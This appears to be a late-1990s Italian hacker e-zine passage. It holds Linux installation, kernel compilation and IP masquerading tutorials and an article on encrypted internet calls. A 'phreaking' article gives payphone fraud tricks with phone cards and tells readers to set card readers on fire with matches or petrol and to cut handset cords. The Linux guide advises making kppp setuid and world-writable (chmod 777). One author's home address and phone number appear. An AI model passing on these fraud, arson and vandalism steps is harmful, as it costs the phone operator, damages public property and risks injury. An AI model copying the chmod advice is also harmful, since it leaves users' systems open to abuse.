verit di queste operazioni logiche, in ingresso avremo una o due variabili binarie X e Y e in uscita verr prodotta la variabile Z che varr 0 o 1 a seconda dell'operazione logica; quindi: AND X Y | Z 0 0 | 0 0 1 | 0 Z = X and Y 1 0 | 0 1 1 | 1 OR X Y | Z 0 0 | 0 0 1 | 1 Z = X or Y 1 0 | 1 1 1 | 1 XOR X Y | Z 0 0 | 0 0 1 | 1 Z = X xor Y (or esclusivo) 1 0 | 1 1 1 | 0 NOT X | Z 0 | 1 Z= not X ( il NOT a differenza degli altri un 1 | 0 operatore unario: opera su una sola variabile) Questo quello che si chiama condensato di logica per tutto quello che ci serve sapere sulle operazioni, se volete approfondire il concetto contattatemi e sar lieto di darvi altre informazioni su questo campo della matematica 8-) Beh ora penso di avervi stufato abbastanza con tutta questa matematica ma ritengo che una buona comprensione di questi argomenti faciliti molto la comprensione di quello che faremo in futuro, infatti con il linguaggio Assembly si lavora principalmente con numeri esadecimali, quindi resistete e fate un po' di esempi per capire se avete capito. Per richieste, consigli, suggerimenti, aiuti, contributi, ecc..., contattatemi b0nu$, Emanuele DelBono via Bazoli 27 25127 Brescia Tel 030 - 314591 e-mail : bonus@numerica.it hAck & c ya :-) -------------------------------------------------------------------------------- ** bonus@numerica.it ** +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- _____ _ _ _ / ___| (_) | | (_) BoBo & LaNdo \ `--. ___ _____ ___ _ __ ___ | | _ _ __ _ ___ __ `--. \/ _ \_ / |/ _ \| '_ \ / _ \ | | | | '_ \| | | \ \/ / /\__/ / __// /| | (_) | | | | __/ | |___| | | | | |_| |> < \____/ \___/___|_|\___/|_| |_|\___| \_____/_|_| |_|\__,_/_/\_\ INSTALLARE LINUX: by LiQUID '"+- +- +- +- +- +- +- +- +- ' Installare Linux -=-=-=-=-=-=-=-=-=-=-=-=-=- '" Powered by [LiQUID] Indice: 1/4 00 Indice ;) \ / /$#@ ] 01 Disclaimer \++++++++++/-------/ $#@ ] 02 Cos'e' Linux \ / / $#@ ] 03 Parte 1, installazzione \ /\ / $#@ ] 04 Appendice 1 \ / \ / $#@ ] 05 Appendice 2 \ / \ / $#@ ] Ŀ \ / \ / $#@ ] liquido@freemil.it 1/4+-+-+-\/+-+-+-\/+-+-+-+#@ ] Disclaimer Prima di iniziare vorrei dire che l'autore (io) non puo' essere coinvolto o ritenuto colpevole se succedesse qualcosa di ....strano ;) Inoltre non promette nulla riguardo il corretto funzionamento di questa semplice tecnica. Se pensate di essere coinvolti in qualsiasi maniera in brutte faccende leggendo il testo qui di seguito, fermatevi immediatamente e cancellate questo sporco pugno di bit dal vostro picci! ;-P Se per caso voi veniste coinvolti lo spirito di affrontare questa spiacevole situazione e': 'Io non c'ero, non sono mai esistito, non ne ho la piu' pallida idea di come quello sporco pugno di bit sia finito nel mio picci'!' Salve a tutti.....be' vediamo come posso incominciare?? Innanzitutto questo articolo parler su come installare correttamente linux sul proprio sistema. Prima di partire con l'installazione vera e propria ci terrei a fare una piccola introduzione sul sistema linux, appunto. Che Cos'e' Linux? Linux e' una emulazione gratuita di UNIX per personal computer (386-Pentium PRO), Digital Alpha, PowerPC, Sun SPARC, Apple Macintosh, Atari ST/TT, Amiga, MIPS, che supporta in pieno multitasking (pu eseguire pi operazioni nello stesso momento), multi-user (supporta pi utenti, anche sulla stessa macchina), multithreading, multiplatform (e' in grado di girare su differenti piattaforme , non solo INTEL ma anche Digital Alpha, PowerPC, Sun SPARC, Macintosh e MIPS), prevede funzioni di protezione della memoria tra processi (in maniera tale da non consentire ad un solo programma di mandare in crash l'intero sistema), X Windows, TCP/IP, ottima capacita' di comunicazione con altri sistemi operativi (quali quelli della Microsoft, Apple, Novell) e molto altro ancora. Le sue radici sono profondamente radicate in Internet. Le prime versioni del sistema sono state sviluppate interamente da Linus Torvalds (torvalds@transmeta.com) presso l'Universita' di Helsinki in Finlandia, ma cio' che rende Linux cosi' diverso e' il fatto di essere cresciuto grazie all'aiuto di moltissimi ed eterogenei gruppi di programmatori UNIX ed esperti di Sistemi Operativi che hanno messo a disposizione il codice sorgente da loro prodotto, gratuitamente. Questa eterogeneita' si riferisce sia alle competenze tecniche e al settore di provenienza che alla dislocazione geografica. Affinche' queste comunita' di programmatoripotessero lavorare insieme era necessario un efficiente strumento di comunicazione. Lo strumento fu Internet ed essendo Linux il sistema operativo scelto da queste persone, significa che gli strumenti e le utility necessarie ad utilizzare la Rete furono tra le prime a comparire. Oltre ad essere sviluppate appositamente per Linux, molte delle applicazioni furono portate da quello che era il miglior software disponibile in quel momento sul mercato. Per esempio, il compilatore C e' gcc (della Free Software Foundation): si tratta di un compilatore che viene comunemente utilizzato su piattaforma HP e Sun. In 7 anni Linux e' diventato il sistema operativo piu' evoluto tecnicamente dell'intera categoria e - a causa della disponibilita' dei sorgenti - e' diventato il punto di riferimento per lo sviluppo del kernel da parte di Microsoft e SCO. Inoltre molti degli sviluppatori di Solaris/QNX/AIX/SCO e NT, quando vanno a casa la sera - riscrivono e aggiungono le loro uniche e talvolta proprietarie tecnologie nel codice pubblico di Linux in modo che tutti gli altri possano utilizzarle. Questi sono i punti principali che rendono linux il s.o. pi utilizzato da programmatori professionisti e non (data la semplicit di modificarlo od ampliarli, avendo a disposizione il codice completo del kernel e di tutti i programmi linux). Inoltre e' anche da aggiungere la nota affidabilit in ambito di sicurezza, in quanto e' stato adottato anche dalla NASA (Wow). Ora che ho finito (FINALMENTE!!!) questa pallosissima introduzione su qusto magnifico s.o., possiamo procedere con l'installazione vera e propria. LINUX, PARTE 1 - INSTALLAZIONE Questa breve nota e' rivolta a tutti coloro che, spaventati dai primi insuccessi, hanno desistito dal tentativo di installare Linux, privandosi cos della possibilit di conoscere e adoperare questo potente e affascinante sistema operativo (S.O.). Consapevole delle difficolt che pu incontrare un principiante cerchiamo di chiarire alcuni punti che possano aiutare chi vuole iniziare a lavorare con Linux. Premetto che il mio punto di riferimento sar il CD-ROM della rivista Inter.Net del mese di giugno, facilmente reperibile. Quindi se vi trovate in difficolt perch alcune voci che io menzioner non combaciano con quelle che appariranno a VOI sullo schermo, non prendetevela con me.....forse state installando una distribuzione del S.O. diversa da quella citata sopra. Per la cronaca io proceder con l'installazione della distribuzione RedHat 6.0. Prima di tutto vi dovrete creare un disco boot di installazione, detto anche disco di immagine, ovvero il disco che fa partire l'installazione di Linux. Quindi apriamo il programma per crearci il disco d'immagine facendo: C:\> d: D:\> cd redhat\dosutils D:\redhat\dosutils> rawrite Enter disk image source file name: ..\images\boot.img Enter target diskette drive: a: Please insert a formatted diskette into drive A: and press --ENTER-- : [Enter] D:\dosutils> Perfetto, ora abbiamo creato il nostro meraviglioso disco boot. Schiaffiamolo dentro il lettore floppy e riavviamo! Ora ci dovrebbe apparire qualcosa del tipo: Loading initrd.img......... Loading vmlinuz......... Welcome to Red Hat Linux! OKI, siamo nel programma di installazione J Spingete invio, vi si chieder la lingua, scegliete e premete invio, poi scegliete anche la tastiera: it. A questo punto il programma di installazzione chieder da dove si vuole installare Linux. Noi scegliamo la voce CD-ROM, e confermiamo con invio. Apparir una finestra: inserire il vostro Red Hat CD nel lettore; confermiamo anche qui con invio. Poi apparir una finestra che chieder se aggiornare o installare il sistema. Scegliete installare. Apparir una finestra con suscritto: che tipo di sistema volete installare?..., e poi una piccola lista: Server, Workstation, e Custom. Optate per Custom. Alla domanda se avete il controller SCSI, fate voi, io non ne ho J. Quindi si dovr scegliere quale programma usare per partizionare l'HD. Io uso Disk Druid. Ora dovete aggiungere una partizione swap ed una native. Iniziamo col cancellare HDA1, premendo delete (poi la riaggiungeremo, non vi speventate J. Iniziamo ad aggiungere quella native. Quando premiamo aggiungi ci verr un'altra finestra. In Mount point mettiamo /, mentre in Size (megs) bisogna mettere lo spazio da dedicare alla partizione. Ricordatevi che bisogna aggiungere anche la mini partizione swap. Io la metto da 125 Mb, forse e' un po' troppo ma di spazio ne ho da vendere. In teoria dovrebbe essere un po' pi della RAM effettiva, ma come ho gi detto, non mi faccio problemi di spazio J. In Type scegliamo la voce Linux Native. Se tutto e' filato liscio, aggiungiamo la partizione swap. In Mount lasciamo vuoto e in Size lo spazio rimanente, in Type: Swap. Abbiamo finito con le partizioni. Premere ok e alla finestra area di swap attiva selezionate solo /dev/hdc5, confermando con ok. Apparir quindi una finestra con 'partizione da formattare'. Selezionate /dev/hdc1 Ok e qui abbiamo finito questa prima parte. Passiamo ora a selezionare i vari pacchetti da installare. Printer Support: io non lo metto, tanto la stampante la usa solo mio padre ;-P X Windows System: si, certo Gnome: no, poiche' ho sentito dire che lo Gnome e' troppo bucato, cmq preferisco il Kde KDE: si, l'ho detto prima ;) Mail/www et tools: si, ci serviranno, ovviamente Dos/Windows connectivity: beh, per ora mettetelo, all'inizio pu sempre servire File managers: certo ;) Graphics manipolation: a me piace, io lo metto, mi diverto con la gerafica ;) Consol Games: non lo metto, tanto se devo giocare vado sotto il Windozzo X games: setesso discorso di prima Consol multimedia: si, la bouna musica gothic fa SEMPRE bene! X multimedia support: idem, come prima Net Woeked Workstation: si, certo Dialup Workstation: si News server: no, grazie Nfs server: ma neanche... Smb (Samba) connectivity: si, e' carino, ci potr servire per qualche netbios sparso per la rete ;) Ipx/netware connectivity: no, non mi serve Anonimus ftp server: be' per me e' utile per scambiare file con amici.... Web server: no Dns name sever: no Post gres sql server: no Network management workstation: si Text Document formatting: no C Developement: naturalmente, ci serviranno tutte le libreire c! Developement libraries: certo, vedi sopra C++ developement: ricerto, rivedi sopra X developement: riricerto, ririvedi sopra Gnome developement: abbiamo il kde..... Kernel developement: no, non e' che voglia impedirvi la configurazione del kernel ;), ma questa voce non c'e' nel CD-ROM, e cmq nell'altro CD-ROM ci sono i kernel pi aggiornati Extra documentation: no, grazie Tutto: secondo voi per cosa mi sono corroso le dita fino ad ora? Perfetto, ora abbiamo finito anche con questa parte. Il sistema procedr con la copia dei file sull'HD. Quindi il Linuzzo ci dir di aver piazzato i log di installazzione in /tmp/install.log. Si creer il file system ext, e ci dir che sta cercando l'overlopping, infine installer il tutto. Ci dir che ha rilevato il mouse in ttyS0 (se lo avete in com1, guardate l'appendice porte). Dovremo configurare il mouse, il mio e' terrone di una marca finllandese di merda e poi mi scoccia cercare, quindi seleziono un Mouse Micro$oft Compatible (serial). Emulare i 3 tasti? Si graxie. Alla finestrina di configurazione di rete (la rete LAN), mettiamo no; ed alla configurazione del Time-Zone selezionate Europe/Rome. A questo punto dobbiamo togliere i demoni che non serveono (nota: se all'avvio di Linux troverete delle scritte FAILED in rosso, molto probabilmente avete sbagliato questa parte, ma non dovrete reinstallare tutto da capo, xche' si possono cambiare da dentro Linux J. Ok, i Demoni da togliere sono questi:atd, crond, lpd, nfs, pmcia, portmap, random, sendmail. Anche questa operazione e' finita. Configurazione stampante: volete configurare la stampante? Io metto no, ho gi detto sopra che non la uso. Passwd di ROOT: Inserite la password di root. Dovete digitare due volte la pass. Per evitare errori di digitazione. Ricordatevi che la password di root e' un aspetto critico per la sicurezza del sistema ;)) ok, digitate la pass, ed il gioco e' fatto! Autentication configuration: [ ] enable nis [*] use shadow passwd [*] use md5 passwd. Ok, segnate come sopra e premete invio. BOOT DISK Io uso Lilo, quindi del boot disk non me ne faccio nulla, e segno NO. All'installazione di Lilo dovete installare il boot loader in /dev/hda Master Boot Record. Poi dovete decidere quale sistema avviare di default, usando il tasto F2 per cambiare selezione. PCI Probe: **** PCI entry:**** X SERVER:**** Ok, perfetto a me ha rilevato tutto correttamente ( che culooooo J Monitor setup: il mio monitor e' anche questo terrone e non c'e' nella lista, quindi premo Custom, e confermo con ok. Ancora ok, e poi premo 800*600 (sto monitor del cazz' mi regge solo questa risoluzione L) Continuo il setup del monitor, selezionando 50-70. Quindi dir che deve testare le impostazioni, per cui si preme ok e il video lampegger un po'. Vi confermer la conclusione del test. Poich a me ha dato i risultati giusti, ho premo Uso di default, altrimenti avrei dovuto scegliere manualmente le impostazioni. Si avvier l'ambiente X per vedere se tutto e' ben configurato, e premiamo sul pulsante prima dei 9 secondi, altrimenti il Linuzzo penser che non avremo visto nulla. Chieder se vogliamo avviare l'ambiente X all'avvio del sistema (io metto no, sono innamorato della shell J. CONGRATULAZIONI L'INSTALLAZIONE E' TERMINATA!!!!! Ok ora il nostro picc si riavvier. Al login scriveremo root, e la nostra pass. Dovremo trovarci nella shell. Quindi configuriamo la connessione. Digitiamo vi /etc/ppp/options Premiamo il tasto Esc + dd, poi :wq (per maggiori spiegazioni guardare l'appendice con i comandi del vi). Con questo togliamo la parola lock dalla 1 riga, ed usciamo salvando. Scriviamo echo x.x.x.x > /etc/resolv.conf (dove x.x.x.x e' l'indirizzo numerico del vostro server). Andiamo in /usr/bin con un cd /usr/bin e scriviamo chmod u+s+ kppp, poi chmod 777 kppp. Ok, avviamo X premendo startx. Qui andiamo sulla K > Internet > Kppp. Ora accounts > nuovo. Nome connessione: quellochevolete Numero Tel: il tel del vostro provider. Autenticazione: PAP Andate su Ip e selezionate Indirizzo dinamico. Su DNS aggiungete il DNS del vs. provider, e selezionatelo. Su Gateway, selezionate Gateway predefinito. Su script di accesso lasciate tutto com'e'. Su costi telefonici Italy > TUT e premete OK Andate su Modem e come porta selezionate /dev/ttyS1 Velocit 115200. Poi andate su Comandi Modem: e nella Stringa di inizializzazione al posto di ATZ scrivete ATX3&F e su Stringa di chiamata sostituite ad ATDT ATX3DT. Col mio modem riesco a connettermi, se avete problemi andate a controllare sul libretto del vs modem. Premete OK. Ritornati al kppp inserite user e passwd, e BUONA NAVIGAZIONE (ps se avete bisogno di Netscape andate in /usr/bin/netscape ;) Le ultime righe. Dobbiamo rendere il ns. sistema sicuro (wow). Andate a modificare il file /etc/hosts.deny ed aggiungete ALL:ALL. in questo modo negate l'accesso a tutti gli hosts remoti sul vs sistema. Per ora e' tutto, la prossima volta (se mai ci sar) configureremo il kernel. APPENDICE 1: comandi VI ESC i entra in modalit inserimento ESC o aggiungi una riga sotto il cursore ed entra in modalit inserimento ESC O aggiungi una riga sopra il cursore ed entra in modalit inserimento ESC x cancella la lettera sotto il cursore ESC dd cancella la riga in cui si trova il cursore ESC :w salva il file ESC :w nome_file salva il file con nome nome_file ESC :q esci da Vi ESC :wq salva e esci ESC /chiave per cercare la parola chiave specificata dopo /. Usare poi n e p per ricercare le ulteriori istanze, seguenti o antecedenti, della parola. APPENDICE 2: PORTE Cua0 sta per COM1, cua1 sta per COM2 ecc. ttyS0 equivale a cua0, ttyS1 a cua1, e cosi' via... hda e' l'hard disk IDE primario, hda1, hda2 ecc. sono le partizioni presenti. hdb e' l'hard disk IDE secondario, per le partizioni stesso discorso. hdsa e' l'hard disk SCSI primario. tty1, tty2 ecc. sono i terminali locali. ttyP0, ttyP1 ecc. sono i terminali remoti. by [LiQUID] liquido@freemail.it +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- RICOMPILAZIONE DEL KERNEL: by LaNdo in tv: spenta (mica mi voglio rincoglionire sono le 7:30am) mi sono deciso a scrivere quest'articolo supplementare perch insieme a BoBo pensavamo che non tutti fossero capaci di ricompilare il kernel... cominciamo con un po' di teoria: Esistono 2 tipi di kernel monolitico e modulare: - i kernel monolitici aspetto negativo: sono compilati per essere caricati in ram all'avvio e non essere pi toccati (es: avete compilato il kernel (tutto monolitico) e volete cambiare irq o dma alla vs scheda sonora ...: dovrete ricompilare il kernel con le nuove impostazioni...; aspetto positivo: pi veloce in quanto ha tutti i "drivers" necessari caricati gi in ram...; sistemi operativi che adottano questo tipo di kernel sono Sco OpenServer e Linux. - i kernel modulari aspetto positivo: per cambiare un irq ad un driver compilato come modulo non c' bisogno di ricompilare tutto il kernel,.. basta modificare il relativo file di configurazione e riavviare il pc; altro aspetto positivo: occupa meno memoria in quanto carica i "drivers" (da ora in poi moduli) quando gli occorrono; aspetto negativo: il sistema impiega pi tempo quando necessita di un modulo che non ha caricato e che deve caricare; sistemi operativi che adottano questo tipo di kernel sono Linux e Sco UnixWare 7. Non a caso ho inserito Linux in entrambe le categorie, con Linux infatti possibile (in fase di compilazione) decidere il tipo di kernel da utilizzare,... un mio consiglio: usate il kernel modulare ok basta teoria ... ora un po' di pratica :-) iniziamo: se avete gi installato i sorgenti potete saltare questa fase... (per default far finta che il kernel da compilare sia il 2.2.11) cd /usr/src (la dir dei sorgenti) rm linux (rimuoviamo il link simbolico che punta alla dir dei sorgenti) mkdir linux-2.2.11 (creiamo la dir in cui copieremo il kernel) ln -s linux-2.2.11 (creiamo un link alla dir del kernel) tar xzvf /percorso/linux-2.2.11.tar.gz ./ (al posto del percorso dovrete mettere la dir in cui si trova il kernel compresso) rm -rf linux-2.2.10 (il kernel vecchio) cd linux ok ora avete copiato il kernel... bisogna configurarlo... Esistono 3 modi per configurare il kernel: - tramite gui (grafic user interface) da xwindow (non ci mettete la s finale perch non si chiama Xwindows (brrr ... orrore .. mi ricorda Wincess)) - tramite caratteri semigrafici da una shell - tramite interfaccia testuale (un po' complicato, se sbagliate una cosa dovete ricominciare d'accapo... lasciatela se possibile) la seconda la mia preferita :-) ... a voi la scelta: - make xconfig (lo dovete far partire da una finestra di Xwindow) - make menuconfig (da una shell) - make config (da una shell) sceglietene solo uno !!!!! ora vi appariranno tutte le impostazioni... se sapete un po' d'inglese ok... altrimenti prendetevi un vocabolario ... per ogni voce c' cmq la spiegazione ... ps: quando selezionate una voce vi possono apparire: un asterisco * (che vuol dire che state configurando quella voce come monolitica, una M che vuol dire che la state configurando come modulo, o uno spazio vuoto che vuol dire che non volete quella voce... quando avete finito salvate la configurazione... e uscite al prompt adesso viene la compilazione vera e propria... mettetevi pure comodi ... al prompt digitate: make dep; make clean; make bzImage; make modules; make modules_install; depmod -a .... dovrete aspettare un po'... dipende dalla cpu.... ok appena terminato copiamo il nuovo kernel nella sua dir: cp /usr/src/linux/arch/i386/boot/bzImage /boot/vmlinuz-2.2.10 ora bisogner aggiornare lilo: vi /etc/lilo.conf e aggiungete le seguenti linee: image= /boot/vmlinuz-2.2.10 root= /dev/sda2 (hd e partizione in cui installato linux) label= linux (dovrete cambiare il label del kernel vecchio) read-only ora uscite dal vi e aggiornate il mbr digitando: lilo e ora riavviate .. sperando che non abbiate combinato casini con: shutdown -r now .... nel caso non funzionasse (vi ricordate che vi avevo detto? : "aggiungete le seguenti linee" .. .che vuol dire che le precedenti sono rimaste e quindi potete bootare ancora il vecchio kernel ... altrimenti .... avanti col dischetto rescue....) .........e con questo tutto...... Byex LaNdo +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- ROUTING E MASQUERADING IN LINUX Il Routing e Masquerading in Linux (ovvero come navigare sicuri in Internet utilizzando un firewall Linux) in tv: le qualifiche del GP di Silverstone (azz!! Schumacher secondo !! ... mannaggia ad Hakkinen du caiz) by LaNdo Ero indeciso sull'argomento di questo articolo, poi ho pensato ai Lamah (alcuni pure stupidi, altri solo esagitati) che girano in rete che con programmini stupidi presi chiss dove ti mandano in crash il tuo povero Winzozz mentre stai chattando su Irc o stai postando una domanda su un NewsGroup facendoti perdere oltre alla pazienza anche il filo logico... In questo articolo descriver come impostare il routing tra 2 o pi pc di cui uno (il router vero e proprio) in realt un pc su cui "gira" Linux; sar argomento dei prossimi articoli la configurazione dell'accesso PPP e la configurazione della funzione di filtro del Firewall (naturalmente il Linux); Non faccio riferimento a Firewall per Wincess (tipo Conseal o @t-guard,...) perch notoriamente pi facili da crashare ;-) PS: Naturalmente per far funzionare quello che sto per spiegarvi avrete bisogno di almeno 2 pc e almeno 2 schde di rete (compratevele le vendono pure in macelleria a 30.000 !!!) avete installato Linux ? avete installato le schede di rete ? ... se non l'avete fatto che state aspettando ?... Vabb bando alle bojate cominciamo:... Linux: prima di tutto bisogna compilare il kernel (lo sapete fare vero? ve l'h spiegato nel_ l'articolo precedente) con le seguenti funzioni abilitate: - Enable loadable module support (in modo da abilitare il supporto per i moduli kernel, essendo il masquerading caricato a livello di modulo) - Networking support (mi sembra ovvio) - Network Firewalls (abilitiamo le funzioni di firewall) - TCP/IP Networking (supporto TCP/IP) - IP: forwarding/gatewaying (abilitiamo le funzioni di forwarding dei pacchetti IP) - IP: firewalling (di firewall) - IP: masqueradnig (di masquerading) - IP: always defragment - Dummy net drive support Per default assegner al server Linux l'ip 192.168.0.1 e al pc con windoze 192.168.0.2 il netmask (dipende da quanti pc avete...) nel nostro caso sar 255.255.255.0 (... 254 pc ... e che c'avete un ufficio in casa ?) per assegnare l'ip: ifconfig eth0 192.168.0.1 netmask 255.255.255.0 /sbin/ipchains -P forward DENY /sbin/ipchains -A forward -s 192.168.0.0/5 -d 0/0 -j MASQ echo 1 > /proc/sys/net/ipv4/ip_forward (questi ultimi 3 conviene metterli in uno dei file contenuti nella dir: /etc/rc.d in modo da farlo partire all'avvio). cmq.... Il Server Linux dovr avere l'accesso PPP gi abilitato (si trovano gli script dappertutto ormai) (cmq vi rimando alla proxxima volta ... (PS: preferite una spiegazione sull'accesso PPP o una spegazione sul Firewalling in Linux? Ditemelo!: attila_hack@hotmail.com) In realt il server Linux avr 2 indirizzi ip: - il primo relativo alla nostra mini rete casalinga - il secondo relativo alla connessione dial-up (internet) ... ok il nostro pc Linux ora pronto per condividere l'accesso a Internet .... - Winlose 9x (configurazione) Tra le impostazioni della rete (relativa alla scheda di rete) vanno impostati: -Gateway predefinito: indirizzo ip del pc Linux (nel ns caso: 192.168.0.1) (questo permetter che le richieste per internet vengano fatte direttamente al server Linux) -Server DNS: gli stessi assegnati al pc Linux (per intenderci quelli che avete inserito nello script PPP per la connessione ad internet su Linux) (questo permetter di effettuare il resolving dei nomi dei domini (potreste farne anche a meno ...se vi ricordate che l'indirizzo 204.71.200.75 corrisponde a www.yahoo.com) -Ip: naturalmente quello che vi pare (pure conforme al netmask ... sinn la rete ve la scordate...) nel ns caso: 192.168.0.2 un consiglio: non a caso ho usato l'ip 192.168.0.0 - 192.168.255.255 questo range di ip reso apposta disponibile per questo genere di cose dall'autorit per l'assegnazione degli indirizzi IP (IANA) .... e con questo ho concluso... un ringraziamento a BoBo. ..... per qualunque suggerimento emailate pure ... questo il primo di una lunga serie di articoli (spero interessanti)... .... attenti .... la micia mascherata vi osserva .... Byex LaNdo +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- _________ .__ / _____/ ____ _______|__| ____ ____ ____ \_____ \_/ __ \\___ / |/ _ \ / \_/ __ \ / \ ___/ / /| ( <_> ) | \ ___/ /_______ /\___ >_____ \__|\____/|___| /\___ > \/ \/ \/ \/ \/ BoBo & LaNdo __________.__ __ .__ \______ \ |_________ ____ _____ | | _|__| ____ ____ | ___/ | \_ __ \_/ __ \\__ \ | |/ / |/ \ / ___\ | | | Y \ | \/\ ___/ / __ \| <| | | \/ /_/ > |____| |___| /__| \___ >____ /__|_ \__|___| /\___ / \/ \/ \/ \/ \//_____/ D'AMORE DI PHREAKING E DI ALTRE SCIOCCHEZZE: by The Pac-man DISCLAIMER LEGALE: Questo documento di solo scopo informativo e il suo autore declina ogni responsabilit da ogni suo qualunque utilizzo. Queste cose sono state gi dette e stradette, se non vogliamo pagare le telefonate, mettiamoci il cuore in pace perch i metodi di seguito elencati funzicano una volta su tre. I metodi : Usare una scheda con duecento lire e un'altra possibilmente carica. Usare 3 schede di cui due completamente scariche. Dare fuoco al lettore (con questo metodo non si ottiene niente). Stracciare la cornetta (un souvenir della giornata). 1 Metodo Inseriamo nel lettore la scheda con duecento lire e poi quando sono finite inseriamo l'altra scheda non lasciandola andare, facendo ci dovremmo sentire il rumore del lettore che cerca di prendere la scheda, terminata la conversazione tiriamo fuori la scheda e riagganciamo. 2 Metodo (questa non so se funziona) Inseriamo una scheda carica nel lettore e componiamo il numero, poi quando il lettore a letto l'importo inseriamo le altre due schede, cercando di non farle accavallare e sempre cercando di fare uscire la scheda carica, telefonare al nostro amico emigrato a Haiti e poi riagganciare tanto paga MAMMA TELECOM. 3 Metodo Inseriamo quanti pi fiammiferi anti-vento accesi abbiamo all'interno del lettore oppure spruzziamo poca (ma poca sul serio se no scoppia) benzina nel lettore e poi appicchiamo il rogo. 4 Metodo Prendiamo una tenaglia e tagliamo il filo della cornetta. Tanto semplice. Per informazioni mandatemi un e-mail all'indirizzo pac_man@freemail.it se avete sfide all'incontrario di molti io le accetto girandole ai pi potenti della RTI italiana. Un saluto a Lele, Marco, Tony, i Matrix, il mio ex-sito, Oldiron e tutti gli Attila_Hack. P.s. = Pi che "HACK THE WORLD", meglio "TROMBATI NA BELLA FIGA". +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- COME CRITTARE LE TELEFONATE E PAGARE UN'URBANA INVECE CHE UN'INTERURBANA: by BugByte Ciauz all ;o) ! Come tutti saprete non affatto sicuro parlare al telefono perch qualsiasi deficente puo ascoltare le nostre telefonate... Saprete anche che in italia le interurbane (e non solo) sono tra le piu costose del mondo (azz!). Ebbene oggi grazie a internet si possono risolvere questi 2 problemi, cio parlare senza permettere a un terzo di ascoltarci e pagare una telefonata urbana invece di un'interurbana (wow!). Questo reso possibile da alcuni programmi che crittano le telefonate (utilizzando anche una crittazione piuttosto robusta) e che permettono di parlare con una persona dall'altra parte della terra passando per il proprio provider. Naturalmente anche l'altra persona deve entrare in internet per riuscire a parlare con voi pagando un'urbana.. Mentre per crittare solamente la telefonata si puo fare una connessione dial-up tra i due modem (uno chiama e l'altro aspetta la chiamata). Se dovete fare una connessione urbana i vantaggi della connessione diretta sono: in internet la velocit di connessione (a meno che non abbiate una connessione ISDN.. =) caler parecchio dato il traffico che c' in rete, con una connessione diretta una sola persona paga mentre nella connessione che passa per internet entrambe le persone pagano. Questo tipo di comunicazione pero piuttosto scomoda anche se offre una quasi totale sicurezza, sia per il fatto che entrambe le persone devono avere il modem, sia per il fatto che la connessione molte volte quando si critta il tutto risulta piuttosto lenta e che in alternativa bisogna parlare in uno alla volta e passare all'altro tutte le volte che si ha finito. Io a questo punto preferisco far ascoltare le telefonate se non ho nulla da nascondere e se ho qualcosa da nascondere non dirla via telefono. Certo se avete degli amici che abitano in inghilterra e volete fare lunghe chiacchierate con loro(come nel mio caso ;o) - magari senza crittare la telefonata - questi programmi sono l'ideale. Prima dicevo: quasi totale. Voi allora potreste chiedervi: ma non c' una totale sicurezza? Beh in effetti, facendo i pignoli, se qualcuno DAVVERO interessato alla nostra telefonata ed davvero determinato allora potrebbe farcela.. Ad esempio potrebbe riuscire ad avere la chiave della crittazione o potrebbe registrare il tutto e decrittarlo in seguito . Cmq gente non preoccupativi c' una possibilita su cento che ci riesca ;PP. Comunque giusto che sappiate che un possibilita c'.. A questo punto credo vogliate provare qualche programma ;oD Qui sotto ecco due progs tra i piu noti e il rispettivo url (P.S di entrambi sono disponibili i sorgenti) Nautilus http://www.lila.com/nautilus Speak Freely http://www.fourmilab.ch/speakfree/windows Questi programmi sono considerati dal governo americano come un' ARMA, infatti vietata l'esportazione dagli stati uniti ! Se vi trovate davanti a un programma del genere messo a disposizione da un server statunitense, non si puo scaricare. Cmq non preoccupatevi dai link che vi ho elencato si possono scaricare tranquillamente ;-D. Ora vi spieghero brevemente le caratteristiche di questi due progs.. Speak freely disponibile sia per window (3.1,95,98,NT) sia per sistemi unix. Per fare girare questo progs necessario un 486, un modem a 14.400, una scheda audio e un microfono. Con questo progs anche possibile parlare con piu persone contemporaneamente (weoowo!) E' anche facile da usare e quindi lo consiglio ai neofiti (come me!) Nautilus il progs che preferisco. Le richieste hardware sono molto meno esose (un 386 con un modem a 7.200 ) - come se Speak freely chiedesse un computer di ultima generazione ehehhe - e inoltre dispone di un protocollo di compressione piu avanzato rispetto a Speak freely.. Nautilus gira sia sui personal computer - con linux, msdos o solaris X86 - sia su una Sun Sparctation (Solaris o SunOS). Sconsiglio di farlo girare su winz... E' un po piu tosto da utilizzare rispetto a Speak freely perch non dispone di un'interfaccia grafica.. Ciauz ! Spero che questo piccolo articolo sia servito a qualcosa ! +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- _________________________________________________________________________ 